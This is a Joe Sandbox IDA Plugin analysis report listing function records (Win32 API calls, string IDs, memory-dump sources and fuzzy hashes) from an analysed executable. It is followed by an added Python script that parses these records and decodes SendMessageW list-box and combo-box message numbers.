                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID: Combobox
                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                  • String ID: edit
                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462A22
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  APIs
                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                  • String ID: <local>
                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                  APIs
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • _wcscat.LIBCMT ref: 00444CB7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                  • String ID: SL
                                                                                                                                                  • API String ID: 257928180-181245872
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                  • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                                                                                  • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                  • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                  • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                                                                                  • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                  • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                  • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                                                                                  • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                  • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                                                                                    • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                                                                                    • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                                                                                    • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                                  • String ID: d}K
                                                                                                                                                  • API String ID: 2932060187-3405784397
                                                                                                                                                  • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                  • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                                                                                  • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                  • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                                  • String ID: #32770
                                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                                  • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                  • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                                                                                  • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                  • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                                                                                    • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                                                                                  Strings
                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                  • API String ID: 3158253471-631824599
                                                                                                                                                  • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                  • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                                                                                  • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                  • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9
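Each function record above follows the same shape: an APIs list (direct calls plus "Part of subcall function" lines), an optional Strings list, the Memory Dump Source it was carved from, and a Similarity block with the API ID, String ID and fuzzy hashes. Reading hundreds of these by eye is slow, and the SendMessageW entries only show the raw message number (000001A2, 00000180, 00000182). The script below is an added example, not Joe Sandbox code: it parses records in this text form into dictionaries and decodes the message numbers against the public winuser.h constants (0x0180 = LB_ADDSTRING, 0x0182 = LB_DELETESTRING, 0x01A2 = LB_FINDSTRINGEXACT, and their combo-box equivalents). SAMPLE is a constructed copy of two of the records on this page with the repeated "Associated" dump list left out; every function and table name in the script is the example's own.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and decode the SendMessageW
message numbers they contain.  Added example, not Joe Sandbox's own code.
SAMPLE below is copied from two records on this page (the repeated
'Associated' dump lines are omitted to keep it short)."""
import re

# Public winuser.h values for the list-box / combo-box messages seen in the records.
WINDOW_MESSAGES = {
    0x0143: "CB_ADDSTRING",
    0x0144: "CB_DELETESTRING",
    0x0158: "CB_FINDSTRINGEXACT",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x01A2: "LB_FINDSTRINGEXACT",
}

# "• [Part of subcall function XXXX: ]Name.Module[(args)][,] ref: XXXX"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "• Key: value" lines of the Similarity / Memory Dump Source blocks.
FIELD_RE = re.compile(r"•\s*(?P<key>[^:]+):\s*(?P<val>.*)")

SAMPLE = """\
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
"""


def decode_message(arg):
    """Map the hex Msg argument of SendMessageW to its winuser.h name.
    Returns None for a non-constant argument ('?'), or the hex value if unknown."""
    try:
        value = int(arg, 16)
    except ValueError:
        return None
    return WINDOW_MESSAGES.get(value, f"0x{value:04X}")


def parse_records(text):
    """Split report text into one dict per function record (a record starts at 'APIs')."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"apis": []}
            records.append(rec)
            continue
        if rec is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            call = {"name": m["name"], "module": m["mod"], "args": args,
                    "ref": int(m["ref"], 16), "subcall_of": m["sub"], "message": None}
            if m["name"] == "SendMessageW" and len(args) > 1:
                call["message"] = decode_message(args[1])   # args[1] is the Msg parameter
            rec["apis"].append(call)
            continue
        m = FIELD_RE.match(line)
        if m:
            rec[m["key"].strip().lower().replace(" ", "_")] = m["val"].strip()
    return records


def direct_messages(records):
    """(api_id, string_id, [decoded messages]) for each record's own SendMessageW calls,
    ignoring calls that only occur inside subcalls."""
    out = []
    for rec in records:
        names = [c["message"] for c in rec["apis"]
                 if c["name"] == "SendMessageW" and c["subcall_of"] is None and c["message"]]
        out.append((rec.get("api_id"), rec.get("string_id"), names))
    return out


if __name__ == "__main__":
    for api_id, string_id, names in direct_messages(parse_records(SAMPLE)):
        print(f"{api_id:35} {string_id:20} {', '.join(names)}")
```

Run it on a saved copy of the report text to get one line per function with the message names spelled out; records whose direct SendMessageW argument is "?" (a runtime value) are reported without a name rather than guessed.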